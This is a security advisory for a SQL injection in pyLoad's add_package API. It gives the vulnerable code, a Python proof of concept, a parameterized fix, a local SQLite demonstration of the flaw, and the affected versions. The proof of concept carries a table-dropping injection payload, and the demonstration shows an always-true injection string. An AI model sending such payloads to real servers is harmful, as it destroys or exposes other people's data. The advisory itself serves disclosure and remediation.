GHSA-pwh4-6r3m-j2rf

Source
https://github.com/advisories/GHSA-pwh4-6r3m-j2rf
Import Source
https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-pwh4-6r3m-j2rf/GHSA-pwh4-6r3m-j2rf.json
JSON Data
https://api.test.osv.dev/v1/vulns/GHSA-pwh4-6r3m-j2rf
Aliases
Published
2025-08-12T00:13:46Z
Modified
2025-08-12T13:45:21.009953Z
Severity
  • 7.8 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
Summary
PyLoad vulnerable to SQL Injection via API /json/add_package in add_links parameter
Details

Summary

The parameter add_links in the API /json/add_package is vulnerable to SQL Injection. SQL injection vulnerabilities can lead to sensitive data leakage.

Details

  • Affected file: https://github.com/pyload/pyload/blob/develop/src/pyload/core/database/file_database.py#L271
  • Affected code:

    @style.queue
    def update_link_info(self, data):
        """
        data is list of tuples (name, size, status, url)
        """
        self.c.executemany(
            "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
            data,
        )
        ids = []
        statuses = "','".join(x[3] for x in data)
        self.c.execute(f"SELECT id FROM links WHERE url IN ('{statuses}')")
        for r in self.c:
            ids.append(int(r[0]))
        return ids


    statuses is built from data, and data is the value of the add_links parameter submitted by the user through /json/add_package. Because {statuses} is interpolated directly into the SQL statement instead of being passed as a bound parameter, the user controls part of the query text, which is the SQL injection vulnerability.

  • Vulnerability Chain

    json_blueprint.py#add_package
    src/pyload/core/api/__init__.py#add_package
    src/pyload/core/managers/file_manager.py#add_links
    src/pyload/core/threads/info_thread.py#run
    src/pyload/core/threads/info_thread.py#update_info
    src/pyload/core/managers/file_manager.py#update_file_info
    src/pyload/core/database/file_database.py#update_link_info
    

PoC

```python
import requests

# Placeholder: the cookies of an authenticated pyLoad web session (not defined in
# the original PoC; fill in before running).
your_cookies = {}

if __name__ == "__main__":
    url = "http://localhost:8000/json/add_package"
    data = {
        "add_name": "My Downloads1",
        "add_dest": "0",
        "add_links": "https://www.dailymotion.com/video/x8zzzzz') or 1; Drop table users;--",
        "add_password": "mypassword"
    }

    response = requests.post(url, cookies=your_cookies, data=data)
    print(response.status_code, response.text)
```

[Screenshot omitted: PoC response]

Remediation

```python
def update_link_info(self, data):
    """
    data is list of tuples (name, size, status, url)
    """
    self.c.executemany(
        "UPDATE links SET name=?, size=?, status=? WHERE url=? AND status IN (1,2,3,14)",
        data,
    )

    # Extract all URLs
    urls = [x[3] for x in data]

    # Build a parameterized query to avoid SQL injection
    placeholders = ','.join(['?'] * len(urls))
    query = f"SELECT id FROM links WHERE url IN ({placeholders}) AND status IN (1,2,3,14)"
    self.c.execute(query, urls)

    ids = [int(row[0]) for row in self.c.fetchall()]
    return ids
```
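To make the difference between the spliced query in the Details section and the parameterized fix concrete, here is an added stand-alone example (not pyLoad's code) that rebuilds a minimal links table in an in-memory SQLite database, runs both lookup styles against an honest URL and a tampered one, and chunks the placeholders so that large link batches stay below SQLite's bound-variable limit. The table shape, the sample rows, the tampered string and the chunk size are constructed assumptions for this demonstration.

```python
import sqlite3

# Constructed sample rows (not pyLoad data): (id, name, size, status, url)
SAMPLE_LINKS = [
    (1, "video-a", 100, 1, "https://example.invalid/video/a"),
    (2, "video-b", 200, 2, "https://example.invalid/video/b"),
    (3, "video-c", 300, 3, "https://example.invalid/video/c"),
]


def make_db():
    """Create an in-memory table shaped like pyLoad's links table (assumed shape)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE links (id INTEGER PRIMARY KEY, name TEXT, size INTEGER, "
        "status INTEGER, url TEXT)"
    )
    conn.executemany("INSERT INTO links VALUES (?, ?, ?, ?, ?)", SAMPLE_LINKS)
    conn.commit()
    return conn


def lookup_ids_vulnerable(conn, urls):
    """Same pattern as the advisory: user-controlled URLs spliced into the IN list."""
    joined = "','".join(urls)
    cur = conn.execute(f"SELECT id FROM links WHERE url IN ('{joined}')")
    return [int(r[0]) for r in cur]


def lookup_ids_safe(conn, urls, chunk_size=500):
    """Parameterized variant: one ? per value, bound by sqlite3.

    The list is chunked so the number of placeholders never exceeds SQLite's
    bound-variable limit, which a large add_links batch could otherwise hit.
    """
    ids = []
    for start in range(0, len(urls), chunk_size):
        chunk = urls[start:start + chunk_size]
        placeholders = ",".join("?" * len(chunk))
        cur = conn.execute(
            f"SELECT id FROM links WHERE url IN ({placeholders})", chunk
        )
        ids.extend(int(r[0]) for r in cur)
    return ids


def demo():
    """Run both lookups on an honest URL and on a tampered one; return the results."""
    conn = make_db()
    honest = ["https://example.invalid/video/a"]
    # Constructed tampered value: closes the quoted IN list and appends an
    # always-true condition, so the spliced query stops filtering by url.
    tampered = ["https://example.invalid/video/a') OR 1=1 --"]
    return {
        "vulnerable_honest": lookup_ids_vulnerable(conn, honest),
        "vulnerable_tampered": lookup_ids_vulnerable(conn, tampered),
        "safe_honest": lookup_ids_safe(conn, honest),
        "safe_tampered": lookup_ids_safe(conn, tampered),
    }


def demo_large_batch(extra=1500):
    """Show the chunked safe lookup over a batch larger than one chunk."""
    conn = make_db()
    urls = [row[4] for row in SAMPLE_LINKS]
    urls += [f"https://example.invalid/missing/{i}" for i in range(extra)]
    return sorted(lookup_ids_safe(conn, urls))


if __name__ == "__main__":
    print(demo())
    print(demo_large_batch())
```

The spliced query returns every row for the tampered value because the quoted list has been closed and the rest of the WHERE clause is commented away; the parameterized query binds the whole string as a single value, finds no matching url, and returns nothing. Note also that the spliced version would raise an SQL error on any legitimate URL containing a single quote, which is a second reason to bind parameters rather than escape by hand.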

Impact

Attackers can modify or delete data in the database, causing data errors or loss.

Database specific
{
    "nvd_published_at": "2025-08-11T23:15:26Z",
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-12T00:13:46Z",
    "severity": "HIGH",
    "cwe_ids": [
        "CWE-89"
    ]
}
Affected packages

PyPI / pyload-ng

Affected ranges

Type: ECOSYSTEM
Introduced: 0 (unknown introduced version / all previous versions are affected)
Fixed: 0.5.0b3.dev91

Affected versions

0.*

0.5.0a5.dev528
0.5.0a5.dev532
0.5.0a5.dev535
0.5.0a5.dev536
0.5.0a5.dev537
0.5.0a5.dev539
0.5.0a5.dev540
0.5.0a5.dev545
0.5.0a5.dev562
0.5.0a5.dev564
0.5.0a5.dev565
0.5.0a6.dev570
0.5.0a6.dev578
0.5.0a6.dev587
0.5.0a7.dev596
0.5.0a8.dev602
0.5.0a9.dev615
0.5.0a9.dev629
0.5.0a9.dev632
0.5.0a9.dev641
0.5.0a9.dev643
0.5.0a9.dev655
0.5.0a9.dev806
0.5.0b1.dev1
0.5.0b1.dev2
0.5.0b1.dev3
0.5.0b1.dev4
0.5.0b1.dev5
0.5.0b2.dev9
0.5.0b2.dev10
0.5.0b2.dev11
0.5.0b2.dev12
0.5.0b3.dev13
0.5.0b3.dev14
0.5.0b3.dev17
0.5.0b3.dev18
0.5.0b3.dev19
0.5.0b3.dev20
0.5.0b3.dev21
0.5.0b3.dev22
0.5.0b3.dev24
0.5.0b3.dev26
0.5.0b3.dev27
0.5.0b3.dev28
0.5.0b3.dev29
0.5.0b3.dev30
0.5.0b3.dev31
0.5.0b3.dev32
0.5.0b3.dev33
0.5.0b3.dev34
0.5.0b3.dev35
0.5.0b3.dev38
0.5.0b3.dev39
0.5.0b3.dev40
0.5.0b3.dev41
0.5.0b3.dev42
0.5.0b3.dev43
0.5.0b3.dev44
0.5.0b3.dev45
0.5.0b3.dev46
0.5.0b3.dev47
0.5.0b3.dev48
0.5.0b3.dev49
0.5.0b3.dev50
0.5.0b3.dev51
0.5.0b3.dev52
0.5.0b3.dev53
0.5.0b3.dev54
0.5.0b3.dev57
0.5.0b3.dev60
0.5.0b3.dev62
0.5.0b3.dev64
0.5.0b3.dev65
0.5.0b3.dev66
0.5.0b3.dev67
0.5.0b3.dev68
0.5.0b3.dev69
0.5.0b3.dev70
0.5.0b3.dev71
0.5.0b3.dev72
0.5.0b3.dev73
0.5.0b3.dev74
0.5.0b3.dev75
0.5.0b3.dev76
0.5.0b3.dev77
0.5.0b3.dev78
0.5.0b3.dev79
0.5.0b3.dev80
0.5.0b3.dev81
0.5.0b3.dev82
0.5.0b3.dev85
0.5.0b3.dev87
0.5.0b3.dev88
0.5.0b3.dev89
0.5.0b3.dev90